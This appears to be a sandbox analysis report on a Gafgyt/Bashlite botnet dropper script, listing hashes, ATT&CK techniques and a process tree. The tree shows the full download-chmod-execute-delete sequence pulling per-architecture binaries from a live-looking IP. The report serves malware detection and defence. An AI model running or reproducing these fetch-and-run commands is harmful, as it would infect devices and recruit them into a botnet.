gafgyt | 1909a407766d028d3c093472b44aa98c9e61892d552a28cd5a4fccbc3b08f1a5

Analysis

max time kernel
138s
max time network
149s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
05/03/2025, 18:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sex.sh
Size

1KB
MD5

a70f4bc15c5b399de5c3f066f7185973
SHA1

b901c9043ee387c820e412cf757e76a5d8ef019c
SHA256

1909a407766d028d3c093472b44aa98c9e61892d552a28cd5a4fccbc3b08f1a5
SHA512

39cd4a2de797d4b33f473ccc110e4a1fc670c3d015486572d91d73718e8a53d588b6056e28a5f0a1f78d25fa15ed9435410a57709e51f4388b50aee48f79d837

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

209.141.35.180:23

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt
behavioral2/files/fstream-6.dat	family_gafgyt
behavioral2/files/fstream-7.dat	family_gafgyt
behavioral2/files/fstream-8.dat	family_gafgyt
behavioral2/files/fstream-9.dat	family_gafgyt
behavioral2/files/fstream-10.dat	family_gafgyt
behavioral2/files/fstream-11.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
688	chmod
731	chmod
742	chmod
763	chmod
791	chmod
805	chmod
675	chmod
708	chmod
786	chmod
796	chmod
801	chmod
813	chmod
821	chmod

Executes dropped EXE 11 IoCs

ioc	pid	Process
/tmp/mips	676	sex.sh
/tmp/mipsel	689	sex.sh
/tmp/sh4	709	sex.sh
/tmp/x86	732	sex.sh
/tmp/arm61	743	sex.sh
/tmp/i686	765	sex.sh
/tmp/ppc	787	sex.sh
/tmp/586	792	sex.sh
/tmp/m68k	797	sex.sh
/tmp/dss	806	sex.sh
/tmp/co	814	sex.sh

Modifies Watchdog functionality 1 TTPs 6 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	co
File opened for modification	/dev/misc/watchdog	co
File opened for modification	/dev/watchdog	arm61
File opened for modification	/dev/misc/watchdog	arm61
File opened for modification	/dev/watchdog	dss
File opened for modification	/dev/misc/watchdog	dss

Changes its process name 3 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	743	arm61
Changes the process name, possibly in an attempt to hide itself	806	dss
Changes the process name, possibly in an attempt to hide itself	814	co

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
648	wget
676	mips
678	rm
679	wget
689	mipsel
691	rm

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/arm61	wget
File opened for modification	/tmp/m68k	wget
File opened for modification	/tmp/mipsel	wget
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/i686	wget
File opened for modification	/tmp/ppc	wget
File opened for modification	/tmp/586	wget
File opened for modification	/tmp/dss	wget
File opened for modification	/tmp/co	wget
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/x86	wget

/tmp/sex.sh
/tmp/sex.sh
1⤵
- Executes dropped EXE
PID:646
- /usr/bin/wget
  wget http://209.141.35.180/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:648
- /bin/chmod
  chmod +x mips
  2⤵
  - File and Directory Permissions Modification
  PID:675
- /tmp/mips
  ./mips
  2⤵
  - System Network Configuration Discovery
  PID:676
- /bin/rm
  rm -rf mips
  2⤵
  - System Network Configuration Discovery
  PID:678
- /usr/bin/wget
  wget http://209.141.35.180/mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:679
- /bin/chmod
  chmod +x mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:688
- /tmp/mipsel
  ./mipsel
  2⤵
  - System Network Configuration Discovery
  PID:689
- /bin/rm
  rm -rf mipsel
  2⤵
  - System Network Configuration Discovery
  PID:691
- /usr/bin/wget
  wget http://209.141.35.180/sh4
  2⤵
  - Writes file to tmp directory
  PID:693
- /bin/chmod
  chmod +x sh4
  2⤵
  - File and Directory Permissions Modification
  PID:708
- /tmp/sh4
  ./sh4
  2⤵
  PID:709
- /bin/rm
  rm -rf sh4
  2⤵
  PID:712
- /usr/bin/wget
  wget http://209.141.35.180/x86
  2⤵
  - Writes file to tmp directory
  PID:713
- /bin/chmod
  chmod +x x86
  2⤵
  - File and Directory Permissions Modification
  PID:731
- /tmp/x86
  ./x86
  2⤵
  PID:732
- /bin/rm
  rm -rf x86
  2⤵
  PID:734
- /usr/bin/wget
  wget http://209.141.35.180/arm61
  2⤵
  - Writes file to tmp directory
  PID:736
- /bin/chmod
  chmod +x arm61
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/arm61
  ./arm61
  2⤵
  - Modifies Watchdog functionality
  - Changes its process name
  PID:743
- /bin/rm
  rm -rf arm61
  2⤵
  PID:746
- /usr/bin/wget
  wget http://209.141.35.180/i686
  2⤵
  - Writes file to tmp directory
  PID:748
- /bin/chmod
  chmod +x i686
  2⤵
  - File and Directory Permissions Modification
  PID:763
- /tmp/i686
  ./i686
  2⤵
  PID:765
- /bin/rm
  rm -rf i686
  2⤵
  PID:768
- /usr/bin/wget
  wget http://209.141.35.180/ppc
  2⤵
  - Writes file to tmp directory
  PID:769
- /bin/chmod
  chmod +x ppc
  2⤵
  - File and Directory Permissions Modification
  PID:786
- /tmp/ppc
  ./ppc
  2⤵
  PID:787
- /bin/rm
  rm -rf ppc
  2⤵
  PID:789
- /usr/bin/wget
  wget http://209.141.35.180/586
  2⤵
  - Writes file to tmp directory
  PID:790
- /bin/chmod
  chmod +x 586
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /tmp/586
  ./586
  2⤵
  PID:792
- /bin/rm
  rm -rf 586
  2⤵
  PID:794
- /usr/bin/wget
  wget http://209.141.35.180/m68k
  2⤵
  - Writes file to tmp directory
  PID:795
- /bin/chmod
  chmod +x m68k
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/m68k
  ./m68k
  2⤵
  PID:797
- /bin/rm
  rm -rf m68k
  2⤵
  PID:799
- /usr/bin/wget
  wget http://209.141.35.180/dc
  2⤵
  PID:800
- /bin/chmod
  chmod +x dc
  2⤵
  - File and Directory Permissions Modification
  PID:801
- /tmp/dc
  ./dc
  2⤵
  PID:802
- /bin/rm
  rm -rf dc
  2⤵
  PID:803
- /usr/bin/wget
  wget http://209.141.35.180/dss
  2⤵
  - Writes file to tmp directory
  PID:804
- /bin/chmod
  chmod +x dss
  2⤵
  - File and Directory Permissions Modification
  PID:805
- /tmp/dss
  ./dss
  2⤵
  - Modifies Watchdog functionality
  - Changes its process name
  PID:806
- /bin/rm
  rm -rf dss
  2⤵
  PID:809
- /usr/bin/wget
  wget http://209.141.35.180/co
  2⤵
  - Writes file to tmp directory
  PID:811
- /bin/chmod
  chmod +x co
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/co
  ./co
  2⤵
  - Modifies Watchdog functionality
  - Changes its process name
  PID:814
- /bin/rm
  rm -rf co
  2⤵
  PID:817
- /usr/bin/wget
  wget http://209.141.35.180/scar
  2⤵
  PID:819
- /bin/chmod
  chmod +x scar
  2⤵
  - File and Directory Permissions Modification
  PID:821
- /tmp/scar
  ./scar
  2⤵
  PID:822
- /bin/rm
  rm -rf scar
  2⤵
  PID:823

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/586

Filesize
107KB

MD5
cbd945f02736f58369e5663c8dfcddb5

SHA1
fdef4ac48e576f5ab21bb2673ec5243b71fb4a39

SHA256
33137b6d6deb6000816a968d6a5eb8e070c929f2eee34ac79866bbe530cac972

SHA512
36809e9a783da7ea943c7aa78705af66aa3079a4515b78c20962b9563198e8f681c5b496d794b045052a70e52a9ee0db1e4067c0ba8e16984f80ed47e8fcb7d5

Download Submit
/tmp/arm61

Filesize
174KB

MD5
a4cb6155ed165c5d932d4dbe9bc5a50d

SHA1
09702bf7cadcb03e27362e0bdfdd0fbe04733dd2

SHA256
00a780e3a5959a310ae5ce9dc9bf62c3dc13f48f313ceea6af919474bbc40da4

SHA512
5a5db33ec7fa9e7ddac30b4cdb90e3f8861239d52a4a24ff6fc666a8a1bdd1bbf2a1202c78a73493ec0feebce4f94a8e7729b0f90b0f8f18ab06818aee0e4cb8

Download Submit
/tmp/co

Filesize
174KB

MD5
ce9e1810810e6b0e239318f5dc31b25a

SHA1
ae82e3e8de8d4c4f7b8b0bca1aa983e402020ac7

SHA256
0cc8aaf9c0bc5d096bb21114a82182d61789589e3aab631dc8d63d7c45bb121f

SHA512
9e23aa32eb963c13e5db996ff58fd73a8a3c3c940d2f54f98a2cc54d698de0c53ab9f3f7efe434844b640ff6784ca3a7d7b4e4347bda26887f6eca667b6eef38

Download Submit
/tmp/dss

Filesize
135KB

MD5
e8d38bb426c35ed83435b08b8bbc3031

SHA1
f8860495f4a492d2d5618eb19e0ccf503ac06af5

SHA256
4c63bf14eacca41a2b37159c73bb5ca803e7e9751d56ceb1c48d03d73e71cb47

SHA512
a969842ad191e898295cee590f8a885d9a32437ba8498acd48249e87034d5e4ae9aab7efb1e54638c2dbf1ddc0561de52dcf3013e5d0e2b538bed01a0413ff9e

Download Submit
/tmp/i686

Filesize
111KB

MD5
86448289e8cf37e8d276bc9d78366840

SHA1
8f1bb7e55f0f0c3f4a83f424f01c02cefd74af33

SHA256
8a5698e08c15f3d2da32562290bcb2d2830be248bcb24274d82b27db3d5f22be

SHA512
44852072b6000af961138bb864060b87eb7f8540dcb1926fafa9b33ac301eae37a20f4043d7c18952db6d40a94d1747a4cbc8367101eaabc6d8203d3a3f513c8

Download Submit
/tmp/m68k

Filesize
129KB

MD5
93ba1a54db8b2690a8063b59ec637e82

SHA1
742da73044387aa1e6a5603641c09262c80e4b48

SHA256
78eb5406b17d45451494ad82527a77b54ae8d2eedbb80abf7dbab9e47d01d0e3

SHA512
a0484373cb665286d68145058e75bfd853c919e0b64a8f9851184d4934fc5f3fa5f3101a9460e5dc11f2d415730b1553c01485dd8b8af87bc911a04827745be8

Download Submit
/tmp/mips

Filesize
176KB

MD5
60b95c6a2cdb91e3f29135ea73dd706c

SHA1
70b02c3c51a2c6649612b0a449d7aadca1d4386b

SHA256
8a4d455b32113ecf68ca7c3bbd198d9bb6ef9999ec8113667dad4428a9f5dfd8

SHA512
42aa079db51620611a6afa2fb3ed59bb2636f4eb4a306a2025788e3aeea8150b1d841099603bcb5b092c99b0369375fb7a208805ac4bb6cb4793070a7e13810e

Download Submit
/tmp/mipsel

Filesize
176KB

MD5
15556d92f6eaa19c5c3ff7b7bd87ba71

SHA1
b4d4443790336c97a1b64f95342dbe3970f63d72

SHA256
99eee220442694532ee41062f78adeed9250ad80c73c9e5cc3b920ed6b57fcb9

SHA512
ce75dbade61c8ea4138e47c1399f1d27896878b9f072bec8711e086b0da194871c4710ba0ed0bfa193b5d8b3cc4aafcc13eb82ea82638ecc7e1c1150746a271d

Download Submit
/tmp/ppc

Filesize
128KB

MD5
7b69a5033e3bb132490df75c6abf00e4

SHA1
dda237281936adac28dc0eb91d7669be382615cc

SHA256
b6651d6bfd9d20de8b740946eae3f8a2f920e26d2e1fbd20c4eaf1a193888914

SHA512
26e309f7c17760d89d33e401c37d842ad9c763d4ae5eca89a3f184107801af60967391aefb7c4862f3566a89745d8022c9c20042aafd3282ec47ce14b35de4cd

Download Submit
/tmp/sh4

Filesize
123KB

MD5
b5f7048c42fff2337ff1113bb0ebab26

SHA1
d9cb4cd04fe5552a5cc24fd4ab692a37c639de08

SHA256
6b31005222142c1e07d0737b4c1e077fa45e183e68bbc8760d8dc79519ae83a8

SHA512
c939fe5031dfdbb53abae511920dc43880c8ea27274d3f8be48ef1e23e2a0d3d8f38191904b4b57d4c5c6df1c0e979a96e2ad0e4262c2253e17004a363500e5d

Download Submit
/tmp/x86

Filesize
127KB

MD5
157559a6a87caed4d380e8af1113e307

SHA1
8d017d77074584907e7121e7c531c19327b45722

SHA256
e6b7ae8be758727a77f024706803249065e2b2b112b91d43741818b7fca50096

SHA512
9a91a986908712a52fb41d69810e06bb13e950ace20466c7d929f81f7d18b66d7e415d251ccebd76bcead910e903cb9e1b23f5f55a4d6b56692e99b7552c7ced

Download Submit